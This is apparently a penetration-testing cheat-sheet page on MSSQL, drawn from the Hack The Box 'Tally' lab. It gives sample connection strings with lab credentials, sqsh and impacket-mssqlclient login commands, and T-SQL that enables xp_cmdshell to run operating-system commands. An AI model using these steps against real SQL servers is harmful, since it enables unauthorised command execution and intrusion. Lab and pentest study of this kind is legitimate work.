MSSQL

SQL Server is common service when exposed to the outer world.

Requires: With valid credentials commands can be executed on the victim

Identifying Passwords

# from tally htb
SERVER=TALLY, 1433;DATABASE=orcharddb;UID=sa;PWD=GWE3V65#6KFH93@4GWTG2G;

# example format
PROVIDER=DNOSCPDB;DATA SOURCE=HOME;User ID=sa;PWD=cyb3rs3cn00b;DATABASE=rfdb

Connecting to server

# sqsh -S $ip -U sa -P $pass
sqsh -S 10.10.10.59 -U sa -P "GWE3V65#6KFH93@4GWTG2G"

# via mysqlclient
impacket-mssqlclient -db orcharddb -windows-auth <DOMAIN>/<USERNAME>:<PASSWORD>@<IP> #Recommended -windows-auth when you are going to use a domain. use as domain the netBIOS name of the machine

Code Execution

https://ranakhalil101.medium.com/hack-the-box-tally-writeup-w-o-metasploit-b8bce0684ad3

EXEC sp_configure 'show advanced options', 1;
go
RECONFIGURE; 
go
EXEC sp_configure 'xp_cmdshell', 1;
go
RECONFIGURE; 
go
xp_cmdshell 'whoami';
go

# Check for linked servers
sp_linkedservers
go

PreviousRSync NextNFS

Last updated 1 year ago